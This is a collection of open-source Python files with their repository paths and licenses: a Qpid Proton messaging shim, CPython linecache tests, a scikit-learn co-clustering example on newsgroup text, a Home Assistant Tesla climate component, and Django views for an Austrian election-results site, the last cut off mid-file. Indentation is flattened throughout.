def pn_terminus_set_type(terminus, type):
terminus.type = type
return 0
def pn_terminus_get_address(terminus):
return terminus.address
def pn_terminus_set_address(terminus, address):
terminus.address = address
return 0
def pn_terminus_get_durability(terminus):
return terminus.durability
def pn_terminus_get_expiry_policy(terminus):
return terminus.expiry_policy
def pn_terminus_set_timeout(terminus, timeout):
terminus.timeout = timeout
return 0
def pn_terminus_get_timeout(terminus):
return terminus.timeout
def pn_terminus_get_distribution_mode(terminus):
return terminus.distribution_mode
def pn_terminus_set_distribution_mode(terminus, mode):
terminus.distribution_mode = mode
return 0
def pn_terminus_is_dynamic(terminus):
return terminus.dynamic
def pn_terminus_set_dynamic(terminus, dynamic):
terminus.dynamic = dynamic
return 0
def pn_terminus_properties(terminus):
return terminus.properties
def pn_terminus_capabilities(terminus):
return terminus.capabilities
def pn_terminus_outcomes(terminus):
return terminus.outcomes
def pn_terminus_filter(terminus):
return terminus.filter
def pn_terminus_copy(terminus, src):
terminus.copy(src)
return 0
class pn_link_wrapper(endpoint_wrapper):
def __init__(self, impl):
endpoint_wrapper.__init__(self, impl)
self.source = pn_terminus(PN_SOURCE)
self.remote_source = pn_terminus(PN_UNSPECIFIED)
self.target = pn_terminus(PN_TARGET)
self.remote_target = pn_terminus(PN_UNSPECIFIED)
def on_open(self):
self.impl.setSource(self.source.encode())
self.impl.setTarget(self.target.encode())
def pn_link_attachments(link):
return link.attachments
def pn_link_source(link):
link.source.decode(link.impl.getSource())
return link.source
def pn_link_remote_source(link):
link.remote_source.decode(link.impl.getRemoteSource())
return link.remote_source
def pn_link_target(link):
link.target.decode(link.impl.getTarget())
return link.target
def pn_link_remote_target(link):
link.remote_target.decode(link.impl.getRemoteTarget())
return link.remote_target
def pn_link_condition(link):
return link.condition
def pn_link_remote_condition(link):
return remote_condition(link)
SND_SETTLE_MODE_P2J = {
PN_SND_UNSETTLED: SenderSettleMode.UNSETTLED,
PN_SND_SETTLED: SenderSettleMode.SETTLED,
PN_SND_MIXED: SenderSettleMode.MIXED,
None: None
}
SND_SETTLE_MODE_J2P = {
SenderSettleMode.UNSETTLED: PN_SND_UNSETTLED,
SenderSettleMode.SETTLED: PN_SND_SETTLED,
SenderSettleMode.MIXED: PN_SND_MIXED,
None: None
}
def pn_link_set_snd_settle_mode(link, mode):
link.impl.setSenderSettleMode(SND_SETTLE_MODE_P2J[mode])
def pn_link_snd_settle_mode(link):
return SND_SETTLE_MODE_J2P[link.impl.getSenderSettleMode()]
def pn_link_remote_snd_settle_mode(link):
return SND_SETTLE_MODE_J2P[link.impl.getRemoteSenderSettleMode()]
RCV_SETTLE_MODE_P2J = {
PN_RCV_FIRST: ReceiverSettleMode.FIRST,
PN_RCV_SECOND: ReceiverSettleMode.SECOND,
None: None
}
RCV_SETTLE_MODE_J2P = {
ReceiverSettleMode.FIRST: PN_RCV_FIRST,
ReceiverSettleMode.SECOND: PN_RCV_SECOND,
None: None
}
def pn_link_set_rcv_settle_mode(link, mode):
link.impl.setReceiverSettleMode(RCV_SETTLE_MODE_P2J[mode])
def pn_link_rcv_settle_mode(link):
return RCV_SETTLE_MODE_J2P[link.impl.getReceiverSettleMode()]
def pn_link_remote_rcv_settle_mode(link):
return RCV_SETTLE_MODE_J2P[link.impl.getRemoteReceiverSettleMode()]
def pn_link_is_sender(link):
return isinstance(link.impl, Sender)
def pn_link_is_receiver(link):
return isinstance(link.impl, Receiver)
def pn_link_head(conn, mask):
local, remote = mask2set(mask)
return wrap(conn.impl.linkHead(local, remote), pn_link_wrapper)
def pn_link_next(link, mask):
local, remote = mask2set(mask)
return wrap(link.impl.next(local, remote), pn_link_wrapper)
def pn_link_session(link):
return wrap(link.impl.getSession(), pn_session_wrapper)
def pn_link_state(link):
return endpoint_state(link.impl)
def pn_link_name(link):
return link.impl.getName()
def pn_link_open(link):
link.on_open()
link.impl.open()
def pn_link_close(link):
link.on_close()
link.impl.close()
def pn_link_detach(link):
link.on_close()
link.impl.detach()
def pn_link_flow(link, n):
link.impl.flow(n)
def pn_link_drain(link, n):
link.impl.drain(n)
def pn_link_drained(link):
return link.impl.drained()
def pn_link_draining(link):
return link.impl.draining()
def pn_link_credit(link):
return link.impl.getCredit()
def pn_link_queued(link):
return link.impl.getQueued()
def pn_link_unsettled(link):
return link.impl.getUnsettled()
def pn_link_send(link, bytes):
return link.impl.send(array(bytes, 'b'), 0, len(bytes))
def pn_link_recv(link, limit):
ary = zeros(limit, 'b')
n = link.impl.recv(ary, 0, limit)
if n >= 0:
bytes = ary[:n].tostring()
else:
bytes = None
return n, bytes
def pn_link_advance(link):
return link.impl.advance()
def pn_link_current(link):
return wrap(link.impl.current(), pn_delivery_wrapper)
def pn_link_free(link):
link.impl.free()
def pn_work_head(conn):
return wrap(conn.impl.getWorkHead(), pn_delivery_wrapper)
def pn_work_next(dlv):
return wrap(dlv.impl.getWorkNext(), pn_delivery_wrapper)
DELIVERY_STATES = {
Received: PN_RECEIVED,
Accepted: PN_ACCEPTED,
Rejected: PN_REJECTED,
Released: PN_RELEASED,
Modified: PN_MODIFIED,
None.__class__: 0
}
DISPOSITIONS = {
PN_RECEIVED: Received,
PN_ACCEPTED: Accepted,
PN_REJECTED: Rejected,
PN_RELEASED: Released,
PN_MODIFIED: Modified,
0: lambda: None
}
class pn_disposition:
def __init__(self):
self.type = 0
self.data = pn_data(0)
self.failed = False
self.undeliverable = False
self.annotations = pn_data(0)
self.condition = pn_condition()
self.section_number = 0
self.section_offset = 0
def decode(self, impl):
self.type = DELIVERY_STATES[impl.__class__]
if self.type == PN_REJECTED:
self.condition.decode(impl.getError())
else:
pn_condition_clear(self.condition)
if self.type == PN_MODIFIED:
self.failed = impl.getDeliveryFailed()
self.undeliverable = impl.getUndeliverableHere()
obj2dat(impl.getMessageAnnotations(), self.annotations)
else:
self.failed = False
self.undeliverable = False
pn_data_clear(self.annotations)
if self.type == PN_RECEIVED:
self.section_number = impl.getSectionNumber().longValue()
self.section_offset = impl.getSectionOffset().longValue()
else:
self.section_number = 0
self.section_offset = 0
self.data.clear()
if impl:
# XXX
#self.data.putObject(impl)
pass
self.data.rewind()
def encode(self):
if self.type not in DISPOSITIONS:
raise Skipped()
impl = DISPOSITIONS[self.type]()
if impl is None:
return impl
if self.type == PN_REJECTED:
impl.setError(self.condition.encode())
if self.type == PN_MODIFIED:
impl.setDeliveryFailed(self.failed)
impl.setUndeliverableHere(self.undeliverable)
ann = dat2obj(self.annotations)
if ann: impl.setMessageAnnotations(ann)
if self.type == PN_RECEIVED:
if self.section_number:
impl.setSectionNumber(UnsignedInteger.valueOf(self.section_number))
if self.section_offset:
impl.setSectionOffset(UnsignedLong.valueOf(self.section_offset))
return impl
def pn_disposition_type(dsp):
return dsp.type
def pn_disposition_is_failed(dsp):
return dsp.failed
def pn_disposition_set_failed(dsp, failed):
dsp.failed = failed
def pn_disposition_is_undeliverable(dsp):
return dsp.undeliverable
def pn_disposition_set_undeliverable(dsp, undeliverable):
dsp.undeliverable = undeliverable
def pn_disposition_data(dsp):
return dsp.data
def pn_disposition_annotations(dsp):
return dsp.annotations
def pn_disposition_condition(dsp):
return dsp.condition
def pn_disposition_get_section_number(dsp):
return dsp.section_number
def pn_disposition_set_section_number(dsp, number):
dsp.section_number = number
def pn_disposition_get_section_offset(dsp):
return dsp.section_offset
def pn_disposition_set_section_offset(dsp, offset):
dsp.section_offset = offset
class pn_delivery_wrapper:
def __init__(self, impl):
self.impl = impl
self.attachments = {}
self.local = pn_disposition()
self.remote = pn_disposition()
def pn_delivery(link, tag):
return wrap(link.impl.delivery(array(tag, 'b')), pn_delivery_wrapper)
def pn_delivery_tag(dlv):
return dlv.impl.getTag().tostring()
def pn_delivery_attachments(dlv):
return dlv.attachments
def pn_delivery_partial(dlv):
return dlv.impl.isPartial()
def pn_delivery_pending(dlv):
return dlv.impl.pending()
def pn_delivery_writable(dlv):
return dlv.impl.isWritable()
def pn_delivery_readable(dlv):
return dlv.impl.isReadable()
def pn_delivery_updated(dlv):
return dlv.impl.isUpdated()
def pn_delivery_settled(dlv):
return dlv.impl.remotelySettled()
def pn_delivery_local(dlv):
dlv.local.decode(dlv.impl.getLocalState())
return dlv.local
def pn_delivery_local_state(dlv):
dlv.local.decode(dlv.impl.getLocalState())
return dlv.local.type
def pn_delivery_remote(dlv):
dlv.remote.decode(dlv.impl.getRemoteState())
return dlv.remote
def pn_delivery_remote_state(dlv):
dlv.remote.decode(dlv.impl.getRemoteState())
return dlv.remote.type
def pn_delivery_update(dlv, state):
dlv.local.type = state
dlv.impl.disposition(dlv.local.encode())
def pn_delivery_link(dlv):
return wrap(dlv.impl.getLink(), pn_link_wrapper)
def pn_delivery_settle(dlv):
dlv.impl.settle()
class pn_transport_wrapper:
def __init__(self, impl):
self.impl = impl
self.attachments = {}
self.server = False
self.condition = pn_condition()
def pn_transport():
return wrap(Proton.transport(), pn_transport_wrapper)
def pn_transport_attachments(trans):
return trans.attachments
def pn_transport_set_server(trans):
trans.server = True;
def pn_transport_get_max_frame(trans):
return trans.impl.getMaxFrameSize()
def pn_transport_set_max_frame(trans, value):
trans.impl.setMaxFrameSize(value)
def pn_transport_get_remote_max_frame(trans):
return trans.impl.getRemoteMaxFrameSize()
def pn_transport_set_idle_timeout(trans, value):
trans.impl.setIdleTimeout(value);
def pn_transport_get_idle_timeout(trans):
return trans.impl.getIdleTimeout()
def pn_transport_get_remote_idle_timeout(trans):
return trans.impl.getRemoteIdleTimeout()
def pn_transport_get_frames_input(trans):
raise Skipped()
def pn_transport_set_channel_max(trans, n):
trans.impl.setChannelMax(n)
def pn_transport_get_channel_max(trans):
return trans.impl.getChannelMax()
def pn_transport_remote_channel_max(trans):
return trans.impl.getRemoteChannelMax()
def pn_transport_tick(trans, now):
return trans.impl.tick(now);
def pn_transport_bind(trans, conn):
trans.impl.bind(conn.impl)
return 0
def pn_transport_unbind(trans):
trans.impl.unbind()
return 0
def pn_transport_trace(trans, n):
trans.impl.trace(n)
def pn_transport_pending(trans):
return trans.impl.pending()
def pn_transport_peek(trans, size):
size = min(trans.impl.pending(), size)
ba = zeros(size, 'b')
if size:
bb = trans.impl.head()
bb.get(ba)
bb.position(0)
return 0, ba.tostring()
def pn_transport_pop(trans, size):
trans.impl.pop(size)
def pn_transport_capacity(trans):
return trans.impl.capacity()
def pn_transport_push(trans, input):
cap = pn_transport_capacity(trans)
if cap < 0:
return cap
elif len(input) > cap:
input = input[:cap]
bb = trans.impl.tail()
bb.put(array(input, 'b'))
trans.impl.process()
return len(input)
def pn_transport_close_head(trans):
trans.impl.close_head()
return 0
def pn_transport_close_tail(trans):
trans.impl.close_tail()
return 0
def pn_transport_closed(trans):
return trans.impl.isClosed()
def pn_transport_condition(trans):
trans.condition.decode(trans.impl.getCondition())
return trans.condition
from org.apache.qpid.proton.engine import Event
PN_REACTOR_INIT = Event.Type.REACTOR_INIT
PN_REACTOR_QUIESCED = Event.Type.REACTOR_QUIESCED
PN_REACTOR_FINAL = Event.Type.REACTOR_FINAL
PN_TIMER_TASK = Event.Type.TIMER_TASK
PN_CONNECTION_INIT = Event.Type.CONNECTION_INIT
PN_CONNECTION_BOUND = Event.Type.CONNECTION_BOUND
PN_CONNECTION_UNBOUND = Event.Type.CONNECTION_UNBOUND
PN_CONNECTION_LOCAL_OPEN = Event.Type.CONNECTION_LOCAL_OPEN
PN_CONNECTION_REMOTE_OPEN = Event.Type.CONNECTION_REMOTE_OPEN
PN_CONNECTION_LOCAL_CLOSE = Event.Type.CONNECTION_LOCAL_CLOSE
PN_CONNECTION_REMOTE_CLOSE = Event.Type.CONNECTION_REMOTE_CLOSE
PN_CONNECTION_FINAL = Event.Type.CONNECTION_FINAL
PN_SESSION_INIT = Event.Type.SESSION_INIT
PN_SESSION_LOCAL_OPEN = Event.Type.SESSION_LOCAL_OPEN
PN_SESSION_REMOTE_OPEN = Event.Type.SESSION_REMOTE_OPEN
PN_SESSION_LOCAL_CLOSE = Event.Type.SESSION_LOCAL_CLOSE
PN_SESSION_REMOTE_CLOSE = Event.Type.SESSION_REMOTE_CLOSE
PN_SESSION_FINAL = Event.Type.SESSION_FINAL
PN_LINK_INIT = Event.Type.LINK_INIT
PN_LINK_LOCAL_OPEN = Event.Type.LINK_LOCAL_OPEN
PN_LINK_REMOTE_OPEN = Event.Type.LINK_REMOTE_OPEN
PN_LINK_LOCAL_CLOSE = Event.Type.LINK_LOCAL_CLOSE
PN_LINK_REMOTE_CLOSE = Event.Type.LINK_REMOTE_CLOSE
PN_LINK_LOCAL_DETACH = Event.Type.LINK_LOCAL_DETACH
PN_LINK_REMOTE_DETACH = Event.Type.LINK_REMOTE_DETACH
PN_LINK_FLOW = Event.Type.LINK_FLOW
PN_LINK_FINAL = Event.Type.LINK_FINAL
PN_DELIVERY = Event.Type.DELIVERY
PN_TRANSPORT = Event.Type.TRANSPORT
PN_TRANSPORT_ERROR = Event.Type.TRANSPORT_ERROR
PN_TRANSPORT_HEAD_CLOSED = Event.Type.TRANSPORT_HEAD_CLOSED
PN_TRANSPORT_TAIL_CLOSED = Event.Type.TRANSPORT_TAIL_CLOSED
PN_TRANSPORT_CLOSED = Event.Type.TRANSPORT_CLOSED
PN_SELECTABLE_INIT = Event.Type.SELECTABLE_INIT
PN_SELECTABLE_UPDATED = Event.Type.SELECTABLE_UPDATED
PN_SELECTABLE_READABLE = Event.Type.SELECTABLE_READABLE
PN_SELECTABLE_WRITABLE = Event.Type.SELECTABLE_WRITABLE
PN_SELECTABLE_EXPIRED = Event.Type.SELECTABLE_EXPIRED
PN_SELECTABLE_ERROR = Event.Type.SELECTABLE_ERROR
PN_SELECTABLE_FINAL = Event.Type.SELECTABLE_FINAL
def pn_collector():
return Proton.collector()
def pn_connection_collect(conn, coll):
conn.impl.collect(coll)
class pn_event:
def __init__(self, impl):
self.impl = impl
self.attachments = {}
def pn_collector_peek(coll):
ev = coll.peek()
if ev:
return pn_event(ev.copy())
else:
return None
def pn_collector_pop(coll):
coll.pop()
def pn_collector_free(coll):
pass
def pn_event_reactor(event):
return None
def pn_event_connection(event):
return wrap(event.impl.getConnection(), pn_connection_wrapper)
def pn_event_session(event):
return wrap(event.impl.getSession(), pn_session_wrapper)
def pn_event_link(event):
return wrap(event.impl.getLink(), pn_link_wrapper)
def pn_event_delivery(event):
return wrap(event.impl.getDelivery(), pn_delivery_wrapper)
def pn_event_transport(event):
return wrap(event.impl.getTransport(), pn_transport_wrapper)
from org.apache.qpid.proton.engine.impl import ConnectionImpl, SessionImpl, \
SenderImpl, ReceiverImpl, DeliveryImpl, TransportImpl
J2C = {
ConnectionImpl: "pn_connection",
SessionImpl: "pn_session",
SenderImpl: "pn_link",
ReceiverImpl: "pn_link",
DeliveryImpl: "pn_delivery",
TransportImpl: "pn_transport"
}
wrappers = {
"pn_connection": lambda x: wrap(x, pn_connection_wrapper),
"pn_session": lambda x: wrap(x, pn_session_wrapper),
"pn_link": lambda x: wrap(x, pn_link_wrapper),
"pn_delivery": lambda x: wrap(x, pn_delivery_wrapper),
"pn_transport": lambda x: wrap(x, pn_transport_wrapper),
"pn_void": lambda x: x
}
def pn_event_class(event):
ctx = event.impl.getContext()
return J2C.get(ctx.getClass(), "pn_void")
def pn_event_context(event):
return wrappers[pn_event_class(event)](event.impl.getContext())
def pn_event_type(event):
return event.impl.getType()
def pn_event_type_name(etype):
return str(etype)
def pn_event_category(event):
return event.impl.getCategory()
def pn_event_attachments(event):
return event.attachments
| apache-2.0 |
ShiYw/Sigil | 3rdparty/python/Lib/test/test_linecache.py | 107 | 4133 | """ Tests for the linecache module """
import linecache
import unittest
import os.path
from test import support
FILENAME = linecache.__file__
INVALID_NAME = '!@$)(!@#_1'
EMPTY = ''
TESTS = 'inspect_fodder inspect_fodder2 mapping_tests'
TESTS = TESTS.split()
TEST_PATH = os.path.dirname(__file__)
MODULES = "linecache abc".split()
MODULE_PATH = os.path.dirname(FILENAME)
SOURCE_1 = '''
" Docstring "
def function():
return result
'''
SOURCE_2 = '''
def f():
return 1 + 1
a = f()
'''
SOURCE_3 = '''
def f():
return 3''' # No ending newline
class LineCacheTests(unittest.TestCase):
def test_getline(self):
getline = linecache.getline
# Bad values for line number should return an empty string
self.assertEqual(getline(FILENAME, 2**15), EMPTY)
self.assertEqual(getline(FILENAME, -1), EMPTY)
# Float values currently raise TypeError, should it?
self.assertRaises(TypeError, getline, FILENAME, 1.1)
# Bad filenames should return an empty string
self.assertEqual(getline(EMPTY, 1), EMPTY)
self.assertEqual(getline(INVALID_NAME, 1), EMPTY)
# Check whether lines correspond to those from file iteration
for entry in TESTS:
filename = os.path.join(TEST_PATH, entry) + '.py'
with open(filename) as file:
for index, line in enumerate(file):
self.assertEqual(line, getline(filename, index + 1))
# Check module loading
for entry in MODULES:
filename = os.path.join(MODULE_PATH, entry) + '.py'
with open(filename) as file:
for index, line in enumerate(file):
self.assertEqual(line, getline(filename, index + 1))
# Check that bogus data isn't returned (issue #1309567)
empty = linecache.getlines('a/b/c/__init__.py')
self.assertEqual(empty, [])
def test_no_ending_newline(self):
self.addCleanup(support.unlink, support.TESTFN)
with open(support.TESTFN, "w") as fp:
fp.write(SOURCE_3)
lines = linecache.getlines(support.TESTFN)
self.assertEqual(lines, ["\n", "def f():\n", " return 3\n"])
def test_clearcache(self):
cached = []
for entry in TESTS:
filename = os.path.join(TEST_PATH, entry) + '.py'
cached.append(filename)
linecache.getline(filename, 1)
# Are all files cached?
cached_empty = [fn for fn in cached if fn not in linecache.cache]
self.assertEqual(cached_empty, [])
# Can we clear the cache?
linecache.clearcache()
cached_empty = [fn for fn in cached if fn in linecache.cache]
self.assertEqual(cached_empty, [])
def test_checkcache(self):
getline = linecache.getline
# Create a source file and cache its contents
source_name = support.TESTFN + '.py'
self.addCleanup(support.unlink, source_name)
with open(source_name, 'w') as source:
source.write(SOURCE_1)
getline(source_name, 1)
# Keep a copy of the old contents
source_list = []
with open(source_name) as source:
for index, line in enumerate(source):
self.assertEqual(line, getline(source_name, index + 1))
source_list.append(line)
with open(source_name, 'w') as source:
source.write(SOURCE_2)
# Try to update a bogus cache entry
linecache.checkcache('dummy')
# Check that the cache matches the old contents
for index, line in enumerate(source_list):
self.assertEqual(line, getline(source_name, index + 1))
# Update the cache and check whether it matches the new source file
linecache.checkcache(source_name)
with open(source_name) as source:
for index, line in enumerate(source):
self.assertEqual(line, getline(source_name, index + 1))
source_list.append(line)
def test_main():
support.run_unittest(LineCacheTests)
if __name__ == "__main__":
test_main()
| gpl-3.0 |
ssaeger/scikit-learn | examples/bicluster/bicluster_newsgroups.py | 142 | 7183 | """
================================================================
Biclustering documents with the Spectral Co-clustering algorithm
================================================================
This example demonstrates the Spectral Co-clustering algorithm on the
twenty newsgroups dataset. The 'comp.os.ms-windows.misc' category is
excluded because it contains many posts containing nothing but data.
The TF-IDF vectorized posts form a word frequency matrix, which is
then biclustered using Dhillon's Spectral Co-Clustering algorithm. The
resulting document-word biclusters indicate subsets words used more
often in those subsets documents.
For a few of the best biclusters, its most common document categories
and its ten most important words get printed. The best biclusters are
determined by their normalized cut. The best words are determined by
comparing their sums inside and outside the bicluster.
For comparison, the documents are also clustered using
MiniBatchKMeans. The document clusters derived from the biclusters
achieve a better V-measure than clusters found by MiniBatchKMeans.
Output::
Vectorizing...
Coclustering...
Done in 9.53s. V-measure: 0.4455
MiniBatchKMeans...
Done in 12.00s. V-measure: 0.3309
Best biclusters:
----------------
bicluster 0 : 1951 documents, 4373 words
categories : 23% talk.politics.guns, 19% talk.politics.misc, 14% sci.med
words : gun, guns, geb, banks, firearms, drugs, gordon, clinton, cdt, amendment
bicluster 1 : 1165 documents, 3304 words
categories : 29% talk.politics.mideast, 26% soc.religion.christian, 25% alt.atheism
words : god, jesus, christians, atheists, kent, sin, morality, belief, resurrection, marriage
bicluster 2 : 2219 documents, 2830 words
categories : 18% comp.sys.mac.hardware, 16% comp.sys.ibm.pc.hardware, 16% comp.graphics
words : voltage, dsp, board, receiver, circuit, shipping, packages, stereo, compression, package
bicluster 3 : 1860 documents, 2745 words
categories : 26% rec.motorcycles, 23% rec.autos, 13% misc.forsale
words : bike, car, dod, engine, motorcycle, ride, honda, cars, bmw, bikes
bicluster 4 : 12 documents, 155 words
categories : 100% rec.sport.hockey
words : scorer, unassisted, reichel, semak, sweeney, kovalenko, ricci, audette, momesso, nedved
"""
from __future__ import print_function
print(__doc__)
from collections import defaultdict
import operator
import re
from time import time
import numpy as np
from sklearn.cluster.bicluster import SpectralCoclustering
from sklearn.cluster import MiniBatchKMeans
from sklearn.externals.six import iteritems
from sklearn.datasets.twenty_newsgroups import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.cluster import v_measure_score
def number_aware_tokenizer(doc):
""" Tokenizer that maps all numeric tokens to a placeholder.
For many applications, tokens that begin with a number are not directly
useful, but the fact that such a token exists can be relevant. By applying
this form of dimensionality reduction, some methods may perform better.
"""
token_pattern = re.compile(u'(?u)\\b\\w\\w+\\b')
tokens = token_pattern.findall(doc)
tokens = ["#NUMBER" if token[0] in "0123456789_" else token
for token in tokens]
return tokens
# exclude 'comp.os.ms-windows.misc'
categories = ['alt.atheism', 'comp.graphics',
'comp.sys.ibm.pc.hardware', 'comp.sys.mac.hardware',
'comp.windows.x', 'misc.forsale', 'rec.autos',
'rec.motorcycles', 'rec.sport.baseball',
'rec.sport.hockey', 'sci.crypt', 'sci.electronics',
'sci.med', 'sci.space', 'soc.religion.christian',
'talk.politics.guns', 'talk.politics.mideast',
'talk.politics.misc', 'talk.religion.misc']
newsgroups = fetch_20newsgroups(categories=categories)
y_true = newsgroups.target
vectorizer = TfidfVectorizer(stop_words='english', min_df=5,
tokenizer=number_aware_tokenizer)
cocluster = SpectralCoclustering(n_clusters=len(categories),
svd_method='arpack', random_state=0)
kmeans = MiniBatchKMeans(n_clusters=len(categories), batch_size=20000,
random_state=0)
print("Vectorizing...")
X = vectorizer.fit_transform(newsgroups.data)
print("Coclustering...")
start_time = time()
cocluster.fit(X)
y_cocluster = cocluster.row_labels_
print("Done in {:.2f}s. V-measure: {:.4f}".format(
time() - start_time,
v_measure_score(y_cocluster, y_true)))
print("MiniBatchKMeans...")
start_time = time()
y_kmeans = kmeans.fit_predict(X)
print("Done in {:.2f}s. V-measure: {:.4f}".format(
time() - start_time,
v_measure_score(y_kmeans, y_true)))
feature_names = vectorizer.get_feature_names()
document_names = list(newsgroups.target_names[i] for i in newsgroups.target)
def bicluster_ncut(i):
rows, cols = cocluster.get_indices(i)
if not (np.any(rows) and np.any(cols)):
import sys
return sys.float_info.max
row_complement = np.nonzero(np.logical_not(cocluster.rows_[i]))[0]
col_complement = np.nonzero(np.logical_not(cocluster.columns_[i]))[0]
# Note: the following is identical to X[rows[:, np.newaxis], cols].sum() but
# much faster in scipy <= 0.16
weight = X[rows][:, cols].sum()
cut = (X[row_complement][:, cols].sum() +
X[rows][:, col_complement].sum())
return cut / weight
def most_common(d):
"""Items of a defaultdict(int) with the highest values.
Like Counter.most_common in Python >=2.7.
"""
return sorted(iteritems(d), key=operator.itemgetter(1), reverse=True)
bicluster_ncuts = list(bicluster_ncut(i)
for i in range(len(newsgroups.target_names)))
best_idx = np.argsort(bicluster_ncuts)[:5]
print()
print("Best biclusters:")
print("----------------")
for idx, cluster in enumerate(best_idx):
n_rows, n_cols = cocluster.get_shape(cluster)
cluster_docs, cluster_words = cocluster.get_indices(cluster)
if not len(cluster_docs) or not len(cluster_words):
continue
# categories
counter = defaultdict(int)
for i in cluster_docs:
counter[document_names[i]] += 1
cat_string = ", ".join("{:.0f}% {}".format(float(c) / n_rows * 100, name)
for name, c in most_common(counter)[:3])
# words
out_of_cluster_docs = cocluster.row_labels_ != cluster
out_of_cluster_docs = np.where(out_of_cluster_docs)[0]
word_col = X[:, cluster_words]
word_scores = np.array(word_col[cluster_docs, :].sum(axis=0) -
word_col[out_of_cluster_docs, :].sum(axis=0))
word_scores = word_scores.ravel()
important_words = list(feature_names[cluster_words[i]]
for i in word_scores.argsort()[:-11:-1])
print("bicluster {} : {} documents, {} words".format(
idx, n_rows, n_cols))
print("categories : {}".format(cat_string))
print("words : {}\n".format(', '.join(important_words)))
| bsd-3-clause |
nugget/home-assistant | homeassistant/components/tesla/climate.py | 2 | 3315 | """Support for Tesla HVAC system."""
import logging
from homeassistant.components.climate import ClimateDevice, ENTITY_ID_FORMAT
from homeassistant.components.climate.const import (
SUPPORT_OPERATION_MODE, SUPPORT_TARGET_TEMPERATURE)
from homeassistant.components.tesla import DOMAIN as TESLA_DOMAIN
from homeassistant.components.tesla import TeslaDevice
from homeassistant.const import (
ATTR_TEMPERATURE, STATE_OFF, STATE_ON, TEMP_CELSIUS, TEMP_FAHRENHEIT)
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['tesla']
OPERATION_LIST = [STATE_ON, STATE_OFF]
SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_OPERATION_MODE
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the Tesla climate platform."""
devices = [TeslaThermostat(device, hass.data[TESLA_DOMAIN]['controller'])
for device in hass.data[TESLA_DOMAIN]['devices']['climate']]
add_entities(devices, True)
class TeslaThermostat(TeslaDevice, ClimateDevice):
"""Representation of a Tesla climate."""
def __init__(self, tesla_device, controller):
"""Initialize the Tesla device."""
super().__init__(tesla_device, controller)
self.entity_id = ENTITY_ID_FORMAT.format(self.tesla_id)
self._target_temperature = None
self._temperature = None
@property
def supported_features(self):
"""Return the list of supported features."""
return SUPPORT_FLAGS
@property
def current_operation(self):
"""Return current operation ie. On or Off."""
mode = self.tesla_device.is_hvac_enabled()
if mode:
return OPERATION_LIST[0] # On
return OPERATION_LIST[1] # Off
@property
def operation_list(self):
"""List of available operation modes."""
return OPERATION_LIST
def update(self):
"""Call by the Tesla device callback to update state."""
_LOGGER.debug("Updating: %s", self._name)
self.tesla_device.update()
self._target_temperature = self.tesla_device.get_goal_temp()
self._temperature = self.tesla_device.get_current_temp()
@property
def temperature_unit(self):
"""Return the unit of measurement."""
tesla_temp_units = self.tesla_device.measurement
if tesla_temp_units == 'F':
return TEMP_FAHRENHEIT
return TEMP_CELSIUS
@property
def current_temperature(self):
"""Return the current temperature."""
return self._temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
return self._target_temperature
def set_temperature(self, **kwargs):
"""Set new target temperatures."""
_LOGGER.debug("Setting temperature for: %s", self._name)
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature:
self.tesla_device.set_temperature(temperature)
def set_operation_mode(self, operation_mode):
"""Set HVAC mode (auto, cool, heat, off)."""
_LOGGER.debug("Setting mode for: %s", self._name)
if operation_mode == OPERATION_LIST[1]: # off
self.tesla_device.set_status(False)
elif operation_mode == OPERATION_LIST[0]: # heat
self.tesla_device.set_status(True)
| apache-2.0 |
frocentus/offenewahlen-nrw17 | src/viz/views.py | 1 | 3312 | import json
import csv
import os
from django.conf import settings
from django.core import serializers
from django.core.cache import cache
from django.http import HttpResponse, JsonResponse, FileResponse
from django.shortcuts import render
from django.template import loader
from django.template.context_processors import csrf
from django.views.decorators.cache import cache_page
from viz.models import PollingStationResult, ListResult, PollingStation, Election, Municipality, RegionalElectoralDistrict, District, State, Party, RawData, List
from wsgiref.util import FileWrapper
def export_csv(filename, data):
counter = 1
with open(filename, 'w') as csvfile:
csvwriter = csv.writer(csvfile, delimiter=',',quotechar='"')
csvwriter.writerow(['id','gemeinde_name','gemeinde_kennzahl','gemeinde_code','eligible_voters','votes','valid','invalid','ts','spoe_nrw13','oevp_nrw13','fpoe_nrw13','gruene_nrw13','bzoe_nrw13','neos_nrw13','stronach_nrw13','wandel_nrw13','pirat_nrw13','kpoe_nrw13','slp_nrw13','euaus_nrw13','cpoe_nrw13'])
for key, value in data.items():
csvwriter.writerow([str(counter),str(value['gemeinde_name']),str(value['gemeinde_kennzahl']),str(value['gemeinde_code']),str(value['eligible_voters']),str(value['votes']),str(value['valid']),str(value['invalid']),str(value['ts']),str(value['spoe_nrw13']),str(value['oevp_nrw13']),str(value['fpoe_nrw13']),str(value['gruene_nrw13']),str(value['bzoe_nrw13']),str(value['neos_nrw13']),str(value['stronach_nrw13']),str(value['wandel_nrw13']),str(value['pirat_nrw13']),str(value['kpoe_nrw13']),str(value['slp_nrw13']),str(value['euaus_nrw13']),str(value['cpoe_nrw13'])])
counter +=1
def load_test(request):
# Create the HttpResponse object with the appropriate CSV header.
filename = 'data/deployment/loaderio-eac9628bcae9be5601e1f3c62594d162.txt'
wrapper = FileWrapper(open(filename))
response = HttpResponse(wrapper, content_type = 'text/txt')
response['Content-Length'] = os.path.getsize(filename)
response['Content-Disposition'] = 'attachment; filename="loaderio-eac9628bcae9be5601e1f3c62594d162.txt"'
return response
def index(request):
return render(request, 'viz/index_viz.dtl')
def viz_overview(request):
return render(request, 'viz/index_viz_overview.dtl')
def viz_results_map(request):
return render(request, 'viz/index_viz_result_map.dtl')
def viz_results_mapnrw13(request):
return render(request, 'viz/index_viz_result_mapnrw13.dtl')
def viz_results_mapcanvas(request):
return render(request, 'viz/index_viz_result_mapcanvas.dtl')
def viz_results_bar(request):
return render(request, 'viz/index_viz_result_bar.dtl')
def viz_results_timeseries(request):
return render(request, 'viz/index_viz_result_timeseries.dtl')
def serve_nrw13_csv(request):
# Create the HttpResponse object with the appropriate CSV header.
filename = 'data/export/nrw13.csv'
wrapper = FileWrapper(open(filename))
response = HttpResponse(wrapper, content_type = 'text/csv')
response['Content-Length'] = os.path.getsize(filename)
response['Content-Disposition'] = 'attachment; filename="nrw13.csv"'
return response
def waiting(request):
return render(request, 'viz/index_waiting.dtl')
def computing(request):
